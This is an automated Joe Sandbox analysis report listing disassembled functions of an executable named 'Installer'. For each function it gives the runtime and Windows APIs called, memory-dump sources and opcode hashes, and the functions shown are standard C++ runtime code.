                                                                                                                                                                                                                                                    • Instruction ID: 9ca96c35f5db8de7898aaacfd38ee1185af3acd93c890fd304eff3a5ecef789c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5aba878caad82e3e92ef3dcc4e135e6b9babfc44f3b0f01c735265b554f8f78d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F01DB31600A55AFDB239F44DC15FEEB7BCFB04715F014525F815A22A0DB789944CA50
                                                                                                                                                                                                                                                    Function 0035D6EA Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0035D76F
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0035D838
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0035D89F
                                                                                                                                                                                                                                                      • Part of subcall function 0035BF11: HeapAlloc.KERNEL32(00000000,00000018,00000000,?,0034A67D,00000018,?,00343D4A,00000018,00000000), ref: 0035BF43
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0035D8B2
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0035D8BF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1096550386-0
                                                                                                                                                                                                                                                    • Opcode ID: fe88f6f49d7b87d8e0eb081137f86ade1fdbe924ddf5b8ab0a4c5481d6a2af39
                                                                                                                                                                                                                                                    • Instruction ID: 6172299867e538aa085fe899b18cad92fa6594332950ad1209703f353bdb9ac8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe88f6f49d7b87d8e0eb081137f86ade1fdbe924ddf5b8ab0a4c5481d6a2af39
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C519372600206AFFB335F60CC81EBB77A9EF44712B160129FD14DA261E770DC5896A0
                                                                                                                                                                                                                                                    Function 0034EFF1 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32(?,0034EFCE,00348E30,00000000,?,00348E30,0034A2F0), ref: 0034F005
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(00348E38), ref: 0034F024
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(00348E38,0034A2F0,?), ref: 0034F052
                                                                                                                                                                                                                                                    • TryAcquireSRWLockExclusive.KERNEL32(00348E38,0034A2F0,?), ref: 0034F0AD
                                                                                                                                                                                                                                                    • TryAcquireSRWLockExclusive.KERNEL32(00348E38,0034A2F0,?), ref: 0034F0C4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 66001078-0
                                                                                                                                                                                                                                                    • Opcode ID: 831f3a2080b2a02b1e01196c3c6c1edcd90f9abb229f025c1332274603eea853
                                                                                                                                                                                                                                                    • Instruction ID: 4ccf6e84d7d5674cd549dabc7dee5913a853d86bef68e60d37643291a249fac1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 831f3a2080b2a02b1e01196c3c6c1edcd90f9abb229f025c1332274603eea853
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23416971900A0ADFCB22CF65C48196AB3F8FF88315B19493AE45ACB942D730F985CF51
                                                                                                                                                                                                                                                    Function 0034D4C2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 0034D4C9
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0034D4D3
                                                                                                                                                                                                                                                    • int.LIBCPMT ref: 0034D4EA
                                                                                                                                                                                                                                                      • Part of subcall function 0034C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 0034C1F6
                                                                                                                                                                                                                                                      • Part of subcall function 0034C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0034C210
                                                                                                                                                                                                                                                    • codecvt.LIBCPMT ref: 0034D50D
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0034D544
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3716348337-0
                                                                                                                                                                                                                                                    • Opcode ID: 9a0af24da35fea3c6a4595b36f50a662205d8f92fd4dfb0b2c22ba3b0b3f5c3b
                                                                                                                                                                                                                                                    • Instruction ID: 83c6d5f233212dcb37e81cfdeece87b04f36d935983d024123c413e184ec365f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a0af24da35fea3c6a4595b36f50a662205d8f92fd4dfb0b2c22ba3b0b3f5c3b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A601C0359101159FCB03EBA4C851ABEB7F5AF85324F154449F415AF382CF74AE40CB82
                                                                                                                                                                                                                                                    Function 0034ADD7 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 0034ADDE
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0034ADE9
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0034AE57
                                                                                                                                                                                                                                                      • Part of subcall function 0034ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0034ACC2
                                                                                                                                                                                                                                                    • std::locale::_Setgloballocale.LIBCPMT ref: 0034AE04
                                                                                                                                                                                                                                                    • _Yarn.LIBCPMT ref: 0034AE1A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1088826258-0
                                                                                                                                                                                                                                                    • Opcode ID: 517605560d83d3d98971a67c9be9f49fd70871c3ce7b8fff54db95b9c48f5c61
                                                                                                                                                                                                                                                    • Instruction ID: b29d7a1bac269038ff5477155cc6e9caea13dcbfec2a1d49aa8f0a3df82f037d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 517605560d83d3d98971a67c9be9f49fd70871c3ce7b8fff54db95b9c48f5c61
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E401B175A40A609FCB07EB20D89157D77A5FF84750B054009E9155F381CF347E82CF82
                                                                                                                                                                                                                                                    Function 00341750 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 390COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _strlen
                                                                                                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                    • API String ID: 4218353326-1866435925
                                                                                                                                                                                                                                                    • Opcode ID: d4a94234ed542104b119ea23f373db50e851b77d5e07e24ec0e111e51fadfaba
                                                                                                                                                                                                                                                    • Instruction ID: b625be1e48f712ee84b018ff9c3f3d4fb87f9ac7a8671f9ac160f1f809bd0e52
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4a94234ed542104b119ea23f373db50e851b77d5e07e24ec0e111e51fadfaba
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35F15D75A006148FCB15CF68C494BADBBF1FF89324F198269E819AF3A1D734AD45CB90
                                                                                                                                                                                                                                                    Function 00360976 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: GetLastError.KERNEL32(00000000,?,0035E58D), ref: 0035C16E
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000,?,?,00000028,00358363), ref: 0035C210
                                                                                                                                                                                                                                                    • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00355BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00360A35
                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00355BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00360A6C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                                    • String ID: ,K7$utf8
                                                                                                                                                                                                                                                    • API String ID: 943130320-3027620799
                                                                                                                                                                                                                                                    • Opcode ID: 364663e3bf439ebd8ed9532e078ba704acacb530d119c86ec52f32c44565b43b
                                                                                                                                                                                                                                                    • Instruction ID: c0cd88bb7ff1007600d4696f1561263a77868e585bb3e41d1320a999012385cc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 364663e3bf439ebd8ed9532e078ba704acacb530d119c86ec52f32c44565b43b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2651E531600705AADB2FAB71CC43FAB73A8EF05744F15C429F9499B189E6B0D9808765
                                                                                                                                                                                                                                                    Function 003473E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::_Release_chore.LIBCPMT ref: 00347526
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00347561
                                                                                                                                                                                                                                                      • Part of subcall function 0034AF37: CreateThreadpoolWork.KERNEL32(0034B060,00348A2A,00000000,00000000,?,00348A2A,?,?,?,?), ref: 0034AF46
                                                                                                                                                                                                                                                      • Part of subcall function 0034AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 0034AF53
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: Fail to schedule the chore!$G.7
                                                                                                                                                                                                                                                    • API String ID: 3683891980-1612208290
                                                                                                                                                                                                                                                    • Opcode ID: ef3d93b19ab1d66eb08a283490649681ac8aa1e03dd7f23f37ae23b901a2e7a2
                                                                                                                                                                                                                                                    • Instruction ID: 056a8f148b1f63c92e0514928a930f5c99aa6edca77681cee2ed8d76ffa40bc0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef3d93b19ab1d66eb08a283490649681ac8aa1e03dd7f23f37ae23b901a2e7a2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC519CB4D006089FCB16DF94D845BAEBBB4FF08314F144129E8196F391D779A905CF91
                                                                                                                                                                                                                                                    Function 00343E90 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00343EC6
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00344002
                                                                                                                                                                                                                                                      • Part of subcall function 0034ABC5: _Yarn.LIBCPMT ref: 0034ABE5
                                                                                                                                                                                                                                                      • Part of subcall function 0034ABC5: _Yarn.LIBCPMT ref: 0034AC09
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: bad locale name$|=4e.7
                                                                                                                                                                                                                                                    • API String ID: 2070049627-3792104845
                                                                                                                                                                                                                                                    • Opcode ID: 54189e90262ab288d726db517285de6ced36919f9c32965e93c7bd52b2d7ce98
                                                                                                                                                                                                                                                    • Instruction ID: 2ba9a789b8662a8e77c03fe82fbecd0ec8d3ba9ce8eae77c3f224b508da4fe3d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54189e90262ab288d726db517285de6ced36919f9c32965e93c7bd52b2d7ce98
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD417BF0A007459BEB21DF69C805B17BAF8BF04714F044629E8099B780E37AF518CBE2
                                                                                                                                                                                                                                                    Function 0034B755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Ref_count_base::_Decref.LIBCPMT ref: 0034B809
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                    • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                                    • Opcode ID: 3eb40265c8aaa33d8b3e23a23219dee5667495491bdde574b243586a1f46b578
                                                                                                                                                                                                                                                    • Instruction ID: 374655116d5518c8cb36017f723b649600ff578787a6511e6eab3d70465aaae2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3eb40265c8aaa33d8b3e23a23219dee5667495491bdde574b243586a1f46b578
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A721C235900645DFCF2A9FA4C855B6AF7ECEF44720F15491EE4528FA90DB34FA40CA81
                                                                                                                                                                                                                                                    Function 0034F11D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,0034253A,?,?,00000000), ref: 0034F129
                                                                                                                                                                                                                                                    • GetExitCodeThread.KERNEL32(?,00000000,?,?,0034253A,?,?,00000000), ref: 0034F142
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,0034253A,?,?,00000000), ref: 0034F154
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCodeExitHandleObjectSingleThreadWait
                                                                                                                                                                                                                                                    • String ID: :%4
                                                                                                                                                                                                                                                    • API String ID: 2551024706-536517894
                                                                                                                                                                                                                                                    • Opcode ID: d8fc0012224287f642e12f76df90227dd7af092b7e17a4e2324ffb6a1e26ceb9
                                                                                                                                                                                                                                                    • Instruction ID: 70fb550f3eebbadec9955b57b44badbee9eb634750623cca7413cc4fc69d874e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8fc0012224287f642e12f76df90227dd7af092b7e17a4e2324ffb6a1e26ceb9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2DF01971654515EFEF224F74DC06A593BA8EB01774F294320F925DA1F0D731EE41D640
                                                                                                                                                                                                                                                    Function 0034ABC5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Yarn
                                                                                                                                                                                                                                                    • String ID: e.7$|=4e.7
                                                                                                                                                                                                                                                    • API String ID: 1767336200-2368979467
                                                                                                                                                                                                                                                    • Opcode ID: 7b452cb5f8d520daf717b14655729da7eabdee84d1d684a734047d1303c7cc24
                                                                                                                                                                                                                                                    • Instruction ID: 44f2447bf6be94e9143ad255e89d24792c4c1e7df186b6457336445f75e3abbc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b452cb5f8d520daf717b14655729da7eabdee84d1d684a734047d1303c7cc24
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EE03922348600ABEB5AAA65AC92FA633D8CB04B61F10402EF95ECE5D1ED10BC044655
                                                                                                                                                                                                                                                    Function 00366940 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,003669DC,00000000,?,0037D2B0,?,?,?,00366913,00000004,InitializeCriticalSectionEx,00370D34,00370D3C), ref: 0036694D
